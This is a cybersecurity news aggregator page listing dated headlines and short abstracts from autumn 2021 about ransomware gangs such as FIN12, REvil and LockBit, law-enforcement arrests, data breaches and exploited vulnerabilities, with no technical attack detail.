When criminals go corporate: Ransomware-as-a-service Full Text

Abstract In many cases, the groups work on an affiliate model, with the developers taking a cut of the ransom on top of the monthly payment, generally to the tune of around 20 to 50 percent.

The Register

October 08, 2021

Ransomware Group FIN12 Aggressively Going After Healthcare Targets Full Text

Abstract An "aggressive" financially motivated threat actor has been identified as linked to a string of RYUK ransomware attacks since October 2018, while maintaining close partnerships with TrickBot-affiliated threat actors and using a publicly available arsenal of tools such as Cobalt Strike Beacon payloads to interact with victim networks. Cybersecurity firm Mandiant attributed the intrusions to a Russian-speaking hacker group codenamed FIN12, and previously tracked as  UNC1878 , with a disproportionate focus on healthcare organizations with more than $300 million in revenue, among others, including education, financial, manufacturing, and technology sectors, located in North America, Europe, and the Asia Pacific. "FIN12 relies on partners to obtain initial access to victim environments," Mandiant researchers  said . "Notably, instead of conducting multifaceted extortion, a tactic widely adopted by other ransomware threat actors, FIN12 appears to prioritize speed

The Hacker News

October 07, 2021

Russian-speaking hacking group scaling up ransomware attacks on hospitals Full Text

Abstract A Russian-speaking cyber criminal group is disproportionately using ransomware attacks to target hospitals and health care groups across North America as the COVID-19 pandemic continues, according to new research released Thursday. 

The Hill

October 7, 2021

FIN12 ransomware gang don’t implement double extortion to prioritize speed Full Text

Abstract Researchers detailed the activities of the FIN12 ransomware group that earned million of dollars over the past years. Researchers from Mandiant published a detailed report on the activities of a financially motivated ransomware group tracked as FIN12...

Security Affairs

October 5, 2021

Unnamed Ransomware gang uses a Python script to encrypt VMware ESXi servers Full Text

Abstract An unnamed ransomware gang used a custom Python script to target VMware ESXi and encrypt all the virtual machines hosted on the server. Researchers from Sophos were investigating a ransomware attack when discovered that the attackers employed a Python...

Security Affairs

October 05, 2021

Ransomware gang encrypts VMware ESXi servers with Python script Full Text

Abstract Operators of an unknown ransomware gang are using a Python script to encrypt virtual machines hosted on VMware ESXi servers.

BleepingComputer

October 05, 2021

Ransomware Hackers Who Attacked Over 100 Companies Arrested in Ukraine Full Text

Abstract Law enforcement agencies have announced the arrest of two "prolific ransomware operators" in Ukraine who allegedly conducted a string of targeted attacks against large industrial entities in Europe and North America since at least April 2020, marking the latest step in combating ransomware incidents. The joint exercise was undertaken on September 28 by officials from the French National Gendarmerie, the Ukrainian National Police, and the U.S. Federal Bureau of Investigation (FBI), alongside participation from the Europol's European Cybercrime Centre and the INTERPOL's Cyber Fusion Centre. "The criminals would deploy malware and steal sensitive data from these companies, before encrypting their files," Europol  said  in a press statement on Monday. "They would then proceed to offer a decryption key in return for a ransom payment of several millions of euros, threatening to leak the stolen data on the dark web should their demands not be met." B

The Hacker News

October 4, 2021

Transnational Fraud Ring Bilks U.S. Military Service Members Out of Millions Full Text

Abstract A former medical records tech stole PII that was then used to fraudulently claim DoD and VA benefits, particularly targeting disabled veterans.

Threatpost

October 04, 2021

International coalition arrests ‘prolific’ hackers involved in ransomware attacks Full Text

Abstract An international coalition of American, French, Ukrainian and European Union (EU) law enforcement authorities coordinated on the arrest last week of two individuals and the seizure of millions of dollars in profit allegedly involved with a spree of damaging ransomware attacks. 

The Hill

October 4, 2021

Ukrainian Police Arrest Hacker Who Caused $150 Million Damage to Global Firms Full Text

Abstract Ukrainian police said they had arrested a 25-year-old man who hacked more than 100 foreign companies and caused damage worth more than $150 million. The hacker used phishing attacks and hijacked software that allows computers to be accessed remotely.

Reuters

October 4, 2021

Two ransomware operators were arrested in Kyiv with EUROPOL’s support Full Text

Abstract Two ransomware operators arrested in Kyiv, Ukraine, that are suspected to have attacked more than 100 companies causing more than $150M in damages. A joint international law enforcement operation led to the arrest of the ransomware operators in Kyiv,...

Security Affairs

October 04, 2021

Ransomware operators behind hundreds of attacks arrested in Ukraine Full Text

Abstract Europol has announced the arrest of two men in Ukraine, said to be members of a prolific ransomware operation that extorted victims with ransom demands ranging between €5 to €70 million.

BleepingComputer

October 03, 2021

Transnational fraud ring stole millions from Army members, veterans Full Text

Abstract Fredrick Brown, a former U.S. Army contrractor, was sentenced today to 151 months in prison after admitting to his role in a conspiracy that targeted thousands of U.S. servicemembers and veterans and caused millions of dollars in losses.

BleepingComputer

October 3, 2021

TA544 group behind a spike in Ursnif malware campaigns targeting Italy Full Text

Abstract Proofpoint researchers reported that TA544 threat actors are behind a new Ursnif campaign that is targeting Italian organizations. Proofpoint researchers have discovered a new Ursnif baking Trojan campaign carried out by a group tracked as TA544...

Security Affairs

September 29, 2021

New Code Signing Technique isn’t that Effective, Maybe Full Text

Abstract Google researchers highlighted a new threat in the form of OpenSUpdater used by cybercriminals who are targeting people prone to downloading cracked versions of games and other popular software in the U.S. However, Microsoft thinks attackers wouldn't be infecting devices via this technique and unde ... Read More

Cyware Alerts - Hacker News

September 27, 2021

Telegram is becoming the paradise of cyber criminals Full Text

Abstract Telegram is becoming an essential platform for cybercriminal activities, crooks use it but and sell any kind of stolen data and hacking tools. Many experts believe that the popular Telegram app is an efficient alternative to dark web marketplaces,...

Security Affairs

September 24, 2021

Hunting the LockBit Gang’s Exfiltration Infrastructures - Yoroi Full Text

Abstract During the last few months, the LockBit gang decided to develop and evolve a custom tool specialized in data exfiltration and used as a peculiar element to distinguish their criminal brand.

Yoroi

September 24, 2021

Karma Uses Journalists to Get Free Publicity and Pressure Victims Into Paying Ransom Full Text

Abstract The little-known ransomware group has been pursuing a novel strategy to pressure victims into paying: Get journalists to try and name the businesses they've hit, to help pressure them into paying.

Info Risk Today

September 24, 2021

Cybercriminals Sell Billions of Clubhouse and Facebook Scraped User Records on Hacker Forum Full Text

Abstract The user who posted on the hacker forum is asking $100,000 for the full database of 3.8 billion entries but is also willing to split the archive into smaller portions for potential buyers.

Security Affairs

September 24, 2021

REvil Launches Double Chats Scheme to Dupe its Affiliates Full Text

Abstract REvil ransomware gang is back in business with a different mind game as it silently robs its affiliates. Malware specialists have found that the gang is cheating on its affiliates to keep 100% of ransom payments.

Cyware Alerts - Hacker News

September 23, 2021

REvil Affiliates Confirm: Leadership Were Cheating Dirtbags Full Text

Abstract After news of REvil’s rip-off-the-affiliates backdoor & double chats, affiliates fumed, reiterating prior claims against the gang in “Hackers Court.”

Threatpost

September 23, 2021

REvil ransomware devs added a backdoor to cheat affiliates Full Text

Abstract Cybercriminals are slowly realizing that the REvil ransomware operators have been hijacking ransom negotiations, to cut affiliates out of payments.

BleepingComputer

September 22, 2021

Cring ransomware group exploits ancient ColdFusion server Full Text

Abstract In an attack recently investigated by Sophos, an unknown threat actor exploited an ancient-in-internet-years vulnerability in an 11-year-old installation of Adobe ColdFusion 9 to infect the server.

Sophos

September 21, 2021

Cring Ransomware Gang Exploits 11-Year-Old ColdFusion Bug Full Text

Abstract Unidentified threat actors breached a server running an unpatched, 11-year-old version of Adobe's ColdFusion 9 software in minutes to remotely take over control and deploy file-encrypting Cring ransomware on the target's network 79 hours after the hack. The server, which belonged to an unnamed services company, was used to collect timesheet and accounting data for payroll as well as to host a number of virtual machines, according to a report published by Sophos and shared with The Hacker News. The attacks originated from an internet address assigned to the Ukrainian ISP Green Floid. "Devices running vulnerable, outdated software are low-hanging-fruit for cyberattackers looking for an easy way into a target," Sophos principal researcher Andrew Brandt  said . "The surprising thing is that this server was in active daily use. Often the most vulnerable devices are inactive or ghost machines, either forgotten about or overlooked when it comes to patching and upgra

The Hacker News

September 21, 2021

Black Matter gang demanded a $5.9M ransom to NEW Cooperative Full Text

Abstract U.S. The farmers cooperative NEW Cooperative was hit by Black Matter ransomware gang that is demanding a $5.9 million ransom. BlackMatter ransomware gang hit NEW Cooperative, a farmer's feed and grain cooperative, and is demanding a $5.9 million...

Security Affairs

September 20, 2021

Europol arrested 106 fraudsters, members of a major crime ring Full Text

Abstract Europol, along with Italian and Spanish police, dismantled a major crime organization linked to the Italian Mafia that focuses on online frauds. Europol, along with law enforcement agencies in Italy and Spain, has dismantled a major crime group linked...

Security Affairs

September 20, 2021

Europol links Italian Mafia to million-dollar phishing scheme Full Text

Abstract In collaboration with Europol and Eurojust, European law enforcement dismantled an extensive network of cybercriminals linked to the Italian Mafia that was able to defraud their victims of roughly €10 million ($11.7 million) last year alone.

BleepingComputer

September 20, 2021

Europol Busts Major Crime Ring, Arrests Over 100 Online Fraudsters Full Text

Abstract Law enforcement agencies in Italy and Spain have dismantled an organized crime group linked to the Italian Mafia that was involved in online fraud, money laundering, drug trafficking, and property crime, netting the gang about €10 million ($11.7 million) in illegal proceeds in just a year. "The suspects defrauded hundreds of victims through phishing attacks and other types of online fraud such as SIM swapping and business email compromise before laundering the money through a wide network of money mules and shell companies," Europol  said  in a statement published today.  The group operated out of Tenerife, located in Spain's Canary Islands. The development comes following a year-long sting operation that saw as many as 16 house searches, resulting in 106 arrests — mostly in Spain and Italy — and seizure of electronic devices, 224 credit cards, SIM cards, point-of-sale terminals, a marijuana plantation, and equipment used for its cultivation and distribution. 118 ban

The Hacker News

September 20, 2021

Ransomware still a primary threat as cybercriminals evolve tactics Full Text

Abstract Ransomware remains primary threat in the first half of the year. Working with third parties to gain access to targeted networks, they used APT tools and techniques to steal and encrypt victims’ data.

Help Net Security

September 20, 2021

Shining a Light on DarkOxide: A Technical Analysis Full Text

Abstract CrowdStrike Intelligence tracked the DarkOxide threat activity cluster which launched attack campaigns against organizations within the Asia Pacific (APAC) semiconductor industry.

Crowdstrike

September 16, 2021

LockBit 2.0 Gains Free Rein After Recruiting Affiliates Full Text

Abstract LockBit is showing no signs of slowing down as the gang continues to recruit affiliates under its LockBit 2.0 RaaS model. The group’s website displayed that LockBit is six times more active than its contemporaries. At this moment, organizations should start prioritizing their network security ... Read More

Cyware Alerts - Hacker News

September 16, 2021

Microsoft: Windows MSHTML bug now exploited by ransomware gangs Full Text

Abstract Microsoft says multiple threat actors, including ransomware affiliates, are targeting the recently patched Windows MSHTML remote code execution security flaw.

BleepingComputer

September 16, 2021

Links Found Between MSHTML Zero-Day Attacks and Ransomware Operations Full Text

Abstract Microsoft and threat intelligence company RiskIQ reported finding links between the exploitation of a recently patched Windows zero-day vulnerability and known ransomware operators.

Security Week

September 15, 2021

3 Former U.S. Intelligence Officers Admit to Hacking for UAE Company Full Text

Abstract The U.S. Department of Justice (DoJ) on Tuesday disclosed it fined three intelligence community and military personnel $1.68 million in penalties for their role as cyber-mercenaries working on behalf of a U.A.E.-based cybersecurity company. The trio in question — Marc Baier, 49, Ryan Adams, 34, and Daniel Gericke, 40 — are accused of "knowingly and willfully combine, conspire, confederate, and agree with each other to commit offenses, "furnishing defense services to persons and entities in the country over a three year period beginning around December 2015 and continuing through November 2019, including developing invasive spyware capable of breaking into mobile devices without any action by the targets. "The defendants worked as senior managers at a United Arab Emirates (U.A.E.)-based company (U.A.E. CO) that supported and carried out computer network exploitation (CNE) operations (i.e., 'hacking') for the benefit of the U.A.E. government," the DoJ  said

The Hacker News

September 15, 2021

Ransomware gang threatens to wipe decryption key if negotiator hired Full Text

Abstract The Grief ransomware gang is threatening to delete victim's decryption keys if they hire a negotiation firm, making it impossible to recover encrypted files.

BleepingComputer

September 13, 2021

BlackMatter ransomware gang hit Technology giant Olympus Full Text

Abstract Technology giant Olympus announced it was the victim of a ransomware attack and is currently investigating the extent of the incident. Olympus issued a statement to announce that its European, Middle East and Africa computer network was hit by a ransomware...

Security Affairs

September 12, 2021

Revil ransomware operators are targeting new victims Full Text

Abstract Recently we observed that part of the REvil ransomware infrastructure was up and running again, now we can confirm that they hit new victims. On September 7, the servers of the REvil ransomware gang were back online after around two months since...

Security Affairs

September 10, 2021

PYSA Ransomware Gang adds Linux Support Full Text

Abstract In August of 2021, Lacework Labs identified a Linux variant of ChaChi, a customized variant of an open-source Golang based RAT that leverages DNS tunneling for C2 communication.

Lacework

September 10, 2021

Hackers are leaking children’s data — and there’s little parents can do Full Text

Abstract In 2021, ransomware gangs published data from more than 1,200 American K-12 schools, according to a tally provided to NBC News by Brett Callow, a ransomware analyst at the cybersecurity company Emsisoft.

NBC News

September 10, 2021

Inside Genesis: The market created by cybercriminals to make millions selling your digital identity Full Text

Abstract Security researchers warn that the Genesis market, along with other criminal websites, have become an important tool for hacking organizations to carry out malicious attacks.

CBS News

September 09, 2021

Russian Ransomware Group REvil Back Online After 2-Month Hiatus Full Text

Abstract The operators behind the REvil ransomware-as-a-service (RaaS)  staged  a surprise return after a two-month hiatus following the widely publicized attack on technology services provider Kaseya on July 4. Two of the dark web portals, including the gang's Happy Blog data leak site and its payment/negotiation site, have resurfaced online, with the most recent victim added on July 8, five days before the sites  mysteriously went off the grid  on July 13. It's not immediately clear if REvil is back in the game or if they have launched new attacks. "Unfortunately, the Happy Blog is back online," Emsisoft threat researcher Brett Callow  tweeted  on Tuesday. The development comes a little over two months after a  wide-scale supply chain ransomware attack  aimed at Kaseya, which saw the Russia-based cybercrime gang encrypting approximately 60 managed service providers (MSPs) and over 1,500 downstream businesses using a zero-day vulnerability in the Kaseya VSA remote manage

The Hacker News

September 09, 2021

Hackers Leak VPN Account Passwords From 87,000 Fortinet FortiGate Devices Full Text

Abstract Network security solutions provider Fortinet confirmed that a malicious actor had unauthorizedly disclosed VPN login names and passwords associated with 87,000 FortiGate SSL-VPN devices. "These credentials were obtained from systems that remained unpatched against  CVE-2018-13379  at the time of the actor's scan. While they may have since been patched, if the passwords were not reset, they remain vulnerable," the company  said  in a statement on Wednesday. The disclosure comes after the threat actor leaked a list of Fortinet credentials for free on a new Russian-speaking forum called  RAMP  that launched in July 2021 as well as on Groove ransomware's data leak site, with Advanced Intel  noting  that the "breach list contains raw access to the top companies" spanning across 74 countries, including India, Taiwan, Italy, France, and Israel. "2,959 out of 22,500 victims are U.S. entities," the researchers said. CVE-2018-13379  relates to a path t

The Hacker News

September 9, 2021

TeamTNT cybercrime gang expands its arsenal to target thousands of orgs worldwide Full Text

Abstract The financially motivated TeamTNT hacking group expanded its arsenal with new tools used to target thousands of victims worldwide. Researchers from AT&T Alien Labs uncovered a new campaign, tracked as Chimaera, conducted by the TeamTNT group,...

Security Affairs

September 8, 2021

Thailand: Hacker steals 40,000 patients’ data from Bangkok hospital Full Text

Abstract The personal details of more than 40,000 patients at Bhumirajanagarindra Kidney Institute Hospital have been stolen by a hacker, hospital director Thirachai Chantharotsiri said on Wednesday.

Bangkok Post

September 8, 2021

Groove gang leaks list of 500k credentials of compromised Fortinet appliances Full Text

Abstract Groove gang leaked online Fortinet credentials that could be used to breach networks of organizations using the compromised devices. The financially motivated threat actor Groove has leaked online compromised credentials belonging to many organizations....

Security Affairs

September 7, 2021

Ragnar Locker Gang Warns Victims Not to Call the FBI Full Text

Abstract Investigators/the FBI/ransomware negotiators just screw everything up, the ransomware gang said, threatening to publish files if victims look for help.

Threatpost

September 7, 2021

REvil ransomware gang’s servers are mysteriously online again Full Text

Abstract The leak site of the popular REvil ransomware gang is it is not clear if the group resumed operations or the FBI turned on its servers. Today the servers of the REvil ransomware gang were back online after around two months since their shutdown....

Security Affairs

September 07, 2021

Ransomware gang threatens to leak data if victim contacts FBI, police Full Text

Abstract The Ragnar Locker ransomware group is warning that they will leak stolen data from victims that contact law enforcement authorities, like the FBI. Ragnar Locker has previously hit prominent companies with ransomware attacks, demanding millions of dollars in ransom payments.

BleepingComputer

September 7, 2021

Ragnar Locker gang threatens to leak data if victim contacts law enforcement Full Text

Abstract The Ragnar Locker ransomware operators threaten to leak stolen data if the victims attempt to contact law enforcement agencies. The Ragnar Locker ransomware gang is adopting a new technique to force victims to pay the ransom, the operators threaten...

Security Affairs

September 7, 2021

This is the perfect ransomware victim, according to cybercriminals Full Text

Abstract A new KELA report analyzed listings made by ransomware operators in the dark web, including access requests revealing that many want to break into US firms with a minimum revenue of over $100 million.

ZDNet

September 06, 2021

TrickBot gang developer arrested when trying to leave Korea Full Text

Abstract An alleged Russian developer for the notorious TrickBot malware gang was arrested in South Korea after attempting to leave the country.

BleepingComputer

September 6, 2021

Irish Gardai clamp down on cyber gang that attacked HSE Full Text

Abstract Gardaí have seized the cyberinfrastructure used by the cyber gang involved in the HSE cyber attack earlier this year. The operation is believed to have prevented more than 750 ransomware attacks, the Irish Times has reported.

IT Security Guru

September 06, 2021

Ransomware gangs target companies using these criteria Full Text

Abstract Ransomware gangs increasingly purchase access to a victim's network on dark web marketplaces and from other threat actors. Analyzing their want ads makes it possible to get an inside look at the types of companies ransomware operations are targeting for attacks.

BleepingComputer

September 3, 2021

Conti ransomware gang targets Microsoft Exchange servers with ProxyShell exploits Full Text

Abstract The Conti ransomware operators are targeting Microsoft Exchange servers leveraging recently disclosed ProxyShell vulnerability exploits. The Conti ransomware gang is targeting Microsoft Exchange servers leveraging exploits with recently disclosed...

Security Affairs

September 3, 2021

The Increasing Threat Posed by Cybercrime-as-a-Service Full Text

Abstract Researchers from Rapid7’s IntSights revealed that underground criminals are selling unauthorized access to compromised enterprise networks for up to $10,000.

Cyware Alerts - Hacker News

September 02, 2021

FBI warns of ransomware gangs targeting food, agriculture orgs Full Text

Abstract The FBI says ransomware gangs are actively targeting and disrupting the operations of organizations in the food and agriculture sector, causing financial loss and directly affecting the food supply chain.

BleepingComputer

September 01, 2021

Cybercriminals Abusing Internet-Sharing Services to Monetize Malware Campaigns Full Text

Abstract Threat actors are capitalizing on the growing popularity of proxyware platforms like Honeygain and Nanowire to monetize their own malware campaigns, once again illustrating how attackers are quick to  repurpose and weaponize legitimate platforms  to their advantage. "Malware is currently leveraging these platforms to monetize the internet bandwidth of victims, similar to how malicious cryptocurrency mining attempts to monetize the CPU cycles of infected systems," researchers from Cisco Talos  said  in a Tuesday analysis. "In many cases, these applications are featured in multi-stage, multi-payload malware attacks that provide adversaries with multiple monetization methods." Proxyware, also called internet-sharing applications, are legitimate services that allow users to carve out a percentage of their internet bandwidth for other devices, often for a fee, through a client application offered by the provider, enabling other customers to access the internet using

The Hacker News

September 1, 2021

Ransomware Gangs Using Data Leak Sites to Recruit New Affiliates Full Text

Abstract Ransomware gangs are posting announcements on their own data leaks websites. This shift has come about in large part because two major ransomware forums banned gangs from promoting their RaaS schemes.

Security Intelligence

September 01, 2021

LockBit gang leaks Bangkok Airways data, hits Accenture customers Full Text

Abstract Bangkok Airways, a major airline company in Thailand, confirmed it was the victim of a cyberattack earlier this month that compromised personal data of passengers.

BleepingComputer

September 1, 2021

Cybercriminals Abuse the Domain Name System Through Malicious Websites to Exploit Private Networks Full Text

Abstract Allowing arbitrary cross-origin requests is known to be extremely dangerous. Therefore most modern browsers block these requests. However, DNS rebinding provides a way to bypass this restriction.

Palo Alto Networks

September 1, 2021

LockBit ransomware operators leak 200GB of data belonging to Bangkok Airways Full Text

Abstract LockBit ransomware operators have breached Bangkok Airways, the airline confirmed it was the victim and discloses a data breach impacting its passengers. Bangkok Airways, a regional airline based in Bangkok, discloses a data breach...

Security Affairs

August 31, 2021

Cybercriminal sells tool to hide malware in AMD, NVIDIA GPUs Full Text

Abstract Cybercriminals are making strides towards attacks with malware that executes code from the graphics processing unit (GPU) of a compromised system.

BleepingComputer

August 31, 2021

Cybercriminals buy up admin credentials to sharpen attacks on cloud deployments Full Text

Abstract One of the most interesting trends over the past few months, according to a new report, is the rising demand for access to cloud accounts in the sale of admin credentials from Initial Access Brokers.

Tech Republic

August 30, 2021

Ragnarok Quits, Universal Decryption Keys Out Full Text

Abstract The operators of Ragnarok ransomware have called quits and released decryption keys in a recent announcement. Active since 2019, the group had claimed several victims globally. Ragnarok’s sudden disappearance doesn't look like a planned one. A universal decryptor for Ragnarok ransomware has been ... Read More

Cyware Alerts - Hacker News

August 30, 2021

Cybercriminals Steal $29 Million in Crypto Assets from Decentralized Finance Platform Cream Finance Full Text

Abstract Hackers are estimated to have stolen more than $29 million in cryptocurrency assets from Cream Finance, a DeFi platform that allows users to loan and speculate on cryptocurrency price variations.

The Record

August 30, 2021

Deciphering ShinyHunters’ Data Breach Tactics Full Text

Abstract The gang has claimed responsibility for a string of data breaches involving Pixlr, ChqBook, Tokopedia, BigBasket, Microsoft’s GitHub account, and MeetMindful among others.

Cyware Alerts - Hacker News

August 27, 2021

Belgian Police Warns of Cybercriminals Impersonating Europol’s Executive Director to Steal Payment Credentials Full Text

Abstract Scammers are impersonating the head of Europol, the European Union’s law enforcement agency, in an attempt to spook victims into handing over their financial information.

Cyberscoop

August 25, 2021

FIN8 group used a previously undetected Sardonic backdoor in a recent attack Full Text

Abstract Financially motivated threat actor FIN8 employed a previously undocumented backdoor, tracked as 'Sardonic,' in recent attacks. The financially motivated threat actor FIN8 has been observed employing a previously undetected backdoor, dubbed Sardonic,...

Security Affairs

August 25, 2021

ShinyHunters group claims to have data of 70M AT&T customers Full Text

Abstract Threat actors claim to have a database containing private information on roughly 70 million AT&T customers, but the company denies any security breach. ShinyHunters group claims to have a database containing private information on roughly 70 million...

Security Affairs

August 25, 2021

FIN8 cybercrime gang backdoors US orgs with new Sardonic malware Full Text

Abstract A financially motivated cybercrime gang has breached and backdoored the network of a US financial organization with a new malware known dubbed Sardonic by Bitdefender researchers who first spotted it.

BleepingComputer

August 24, 2021

Researchers Warn of 4 Emerging Ransomware Groups That Can Cause Havoc Full Text

Abstract Cybersecurity researchers on Tuesday took the wraps off four up-and-coming ransomware groups that could pose a serious threat to enterprises and critical infrastructure, as the ripple effect of a recent spurt in ransomware incidents show that attackers are growing more sophisticated and more profitable in extracting payouts from victims. "While the ransomware crisis appears poised to get worse before it gets better, the cast of cybercrime groups that cause the most damage is constantly changing," Palo Alto Networks' Unit 42 threat intelligence team  said  in a report shared with The Hacker News. "Groups sometimes go quiet when they've achieved so much notoriety that they become a priority for law enforcement. Others reboot their operations to make them more lucrative by revising their tactics, techniques and procedures, updating their software and launching marketing campaigns to recruit new affiliates." The development comes as ransomware attacks are g

The Hacker News

August 24, 2021

Ransomware gang’s script shows exactly the files they’re after Full Text

Abstract A PowerShell script used by the Pysa ransomware operation gives us a sneak peek at the types of data they attempt to steal during a cyberattack.

BleepingComputer

August 23, 2021

FBI: OnePercent Group Ransomware targeted US orgs since Nov 2020 Full Text

Abstract The Federal Bureau of Investigation (FBI) has shared info about a threat actor known as OnePercent Group that has been actively targeting US organizations in ransomware attacks since at least November 2020.

BleepingComputer

August 23, 2021

Researchers Detail Modus Operandi of ShinyHunters Cyber Crime Group Full Text

Abstract ShinyHunters, a notorious cybercriminal underground group that's been on a data breach spree since last year, has been observed searching companies' GitHub repository source code for vulnerabilities that can be abused to stage larger scale attacks, an analysis of the hackers' modus operandi has revealed. "Primarily operating on Raid Forums, the collective's moniker and motivation can partly be derived from their avatar on social media and other forums: a shiny Umbreon Pokémon," Intel 471 researchers said in a report shared with The Hacker News. "As Pokémon players hunt and collect "shiny" characters in the game, ShinyHunters collects and resells user data." The revelation comes as the  average cost of a data breach  rose from $3.86 million to $4.24 million, making it the highest average cost in 17 years, with compromised credentials responsible for 20% of the breaches reported by over 500 organizations. Since rising to prominence in A

The Hacker News

August 21, 2021

New LockFile ransomware gang uses ProxyShell and PetitPotam exploits Full Text

Abstract A new ransomware gang named LockFile targets Microsoft Exchange servers exploiting the recently disclosed ProxyShell vulnerabilities. A new ransomware gang named LockFile targets Microsoft Exchange servers using the recently disclosed ProxyShell...

Security Affairs

August 21, 2021

New analysis of Diavol ransomware reinforces the link to TrickBot gang Full Text

Abstract In July, researchers from Fortinet reported that a new ransomware family, tracked as Diavol, might have been developed by Wizard Spider, the cybercrime gang behind the TrickBot botnet.

Cyber Defense Magazine

August 20, 2021

Cybercrime Group Asking Insiders for Help in Planting Ransomware Full Text

Abstract A Nigerian threat actor has been observed attempting to recruit employees by offering them to pay $1 million in bitcoins to deploy Black Kingdom ransomware on companies' networks as part of an insider threat scheme. "The sender tells the employee that if they're able to deploy ransomware on a company computer or Windows server, then they would be paid $1 million in bitcoin, or 40% of the presumed $2.5 million ransom," Abnormal Security  said  in a report published Thursday. "The employee is told they can launch the ransomware physically or remotely. The sender provided two methods to contact them if the employee is interested—an Outlook email account and a Telegram username." Black Kingdom, also known as DemonWare and DEMON, attracted attention earlier this March when threat actors were found  exploiting ProxyLogon flaws  impacting Microsoft Exchange Servers to infect unpatched systems with the ransomware strain. Abnormal Security, which detected and bl

The Hacker News

August 19, 2021

Researchers Find New Evidence Linking Diavol Ransomware to TrickBot Gang Full Text

Abstract Cybersecurity researchers have disclosed details about an early development version of a nascent ransomware strain called Diavol that has been linked to threat actors behind the infamous TrickBot syndicate. The latest  findings  from IBM X-Force show that the ransomware sample shares similarities to other malware that has been attributed to the cybercrime gang, thus establishing a clearer connection between the two. In early July, Fortinet  revealed  specifics of an unsuccessful ransomware attack involving Diavol payload targeting one of its customers, highlighting the payload's source code overlaps with that of Conti and its technique of reusing some language from Egregor ransomware in its ransom note. "As part of a rather unique encryption procedure, Diavol operates using user-mode Asynchronous Procedure Calls (APCs) without a symmetric encryption algorithm," Fortinet researchers previously said. "Usually, ransomware authors aim to complete the encryption oper

The Hacker News

August 19, 2021

Threat actors stole $97 million from Liquid cryptocurency exchange Full Text

Abstract Japanese cryptocurrency exchange Liquid was hit by a cyber attack, threat actors stole $97 Million worth of crypto-currency assets from the company. Japan-based cryptocurrency exchange Liquid was hit by a cyber attack that resulted in the theft of $97 Million...

Security Affairs

August 19, 2021

Indra Group Associated with Attacks on Iran Full Text

Abstract Check Point Research said the Indra APT group was behind crippling Iran’s transport ministry and national train system in a cyberattack recently. Attackers disseminated three different versions of Meteor, Stardust, and Comet wipers into the victim's network. Even though the group has not ... Read More

Cyware Alerts - Hacker News

August 18, 2021

New analysis of Diavol ransomware reinforces the link to TrickBot gang Full Text

Abstract Researchers conducted a new analysis of the Diavol ransomware and found new evidence of the link with the gang behind the TrickBot botnet. In July, researchers from Fortinet reported that a new ransomware family, tracked as Diavol, might have been...

Security Affairs

August 18, 2021

T-Mobile: Hackers stole data of 40 million people Full Text

Abstract T-Mobile said Wednesday that data from 40 million former and prospective customers was compromised by hackers as part of a recent breach of the telecom giant.

The Hill

August 17, 2021

Analysis of Diavol Ransomware Reveals Possible Link to TrickBot Gang Full Text

Abstract The code itself is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. Additionally, it can terminate processes and services as needed.

Security Intelligence

August 16, 2021

Recent attacks on Iran were orchestrated by the Indra group Full Text

Abstract The recent attacks that targeted Iran's transport ministry and national train system were conducted by a threat actor dubbed Indra. In July, Iran’s railroad system was hit by a cyberattack, threat actors published fake messages about delays or cancellations...

Security Affairs

August 16, 2021

Threat actor claims to be selling data of more than 100 million T-Mobile customers Full Text

Abstract T-Mobile is investigating a possible data breach after a threat actor published a post on a forum claiming to be selling the personal data of its customers. New problems for T-Mobile, the company is investigating a possible data breach after that...

Security Affairs

August 14, 2021

Four years after its takedown, AlphaBay marketplace revamped Full Text

Abstract The popular black marketplace AlphaBay is back, four years after law enforcement agencies took down the popular hidden service. The darknet marketplace AlphaBay resurfaced four years after an international operation conducted by law enforcement...

Security Affairs

August 14, 2021

Cybercriminals Reportedly Created Blockchain Analytics Tool Full Text

Abstract The tool was created by one of the same developers behind Incognito Market, a darknet marketplace specializing in the sale of narcotics. Incognito was launched in late 2020, and the marketplace accepts payments in both bitcoin and monero.

DataBreach Today

August 13, 2021

Cyberattackers Embrace CAPTCHAs to Hide Phishing, Malware Full Text

Abstract CAPTCHA-protected malicious URLs are snowballing lately, researchers said.

Threatpost

August 13, 2021

SynAck ransomware gang releases decryption keys for old victims Full Text

Abstract The El_Cometa ransomware gang, formerly known as SynAck, has released today master decryption keys (verified by Michael Gillespie) for the victims they infected between July 2017 and early 2021.

The Record

August 13, 2021

Ransomware Gangs Exploiting Windows Print Spooler Vulnerabilities Full Text

Abstract Ransomware operators such as Magniber and Vice Society are actively exploiting vulnerabilities in Windows Print Spooler to compromise victims and spread laterally across a victim's network to deploy file-encrypting payloads on targeted systems. "Multiple, distinct threat actors view this vulnerability as attractive to use during their attacks and may indicate that this vulnerability will continue to see more widespread adoption and incorporation by various adversaries moving forward," Cisco Talos  said  in a report published Thursday, corroborating an  independent analysis  from CrowdStrike, which observed instances of Magniber ransomware infections targeting entities in South Korea. While Magniber ransomware was first spotted in late 2017 singling out victims in South Korea through malvertising campaigns, Vice Society is a new entrant that emerged on the ransomware landscape in mid-2021, primarily targeting public school districts and other educational institutions.

The Hacker News

August 13, 2021

Microsoft Discovers Cybercriminals Using Morse Code to Evade Detection Full Text

Abstract It’s not very often, though, that cyberattackers turn to Morse Code for operational security. But that's what played a part in a year-long phishing campaign that Microsoft researchers outlined.

Cyberscoop

August 12, 2021

Rogue Marketplace AlphaBay Reboots Full Text

Abstract Illicit underground marketplace relaunches years after takedown.

Threatpost

August 12, 2021

Notorious AlphaBay darknet market comes back to life Full Text

Abstract The AlphaBay darkweb market has come back to life after an administrator of the original project relaunched it over the weekend.

BleepingComputer

August 12, 2021

Cybercrime victims lose an estimated $318 billion annually Full Text

Abstract According to the estimates by Comparitech researchers, 71.1 million people fall victim to cybercrimes globally each year which equates to nearly 900 victims per 100,000 people.

Comparitech

August 12, 2021

Magniber Ransomware operators use PrintNightmare exploits to infect Windows servers Full Text

Abstract Threat actors behind the Magniber Ransomware are using PrintNightmare exploits in attacks aimed at Windows servers. Threat actors behind the Magniber Ransomware are exploiting the PrintNightmare flaws (CVE-2021-1675, CVE-2021-34527, and CVE-2021-36958)...

Security Affairs

August 12, 2021

Ransomware gang uses PrintNightmare to breach Windows servers Full Text

Abstract Ransomware operators have added PrintNightmare exploits to their arsenal and are targeting Windows servers to deploy Magniber ransomware payloads.

BleepingComputer

August 12, 2021

European police round up 23 suspected scammers accused of $1.2 million fraud Full Text

Abstract An international police operation resulted in 23 arrests of suspects behind a BEC scheme that last year turned to capitalizing on COVID-19 fears, Europol announced on Wednesday.

Cyberscoop

August 12, 2021

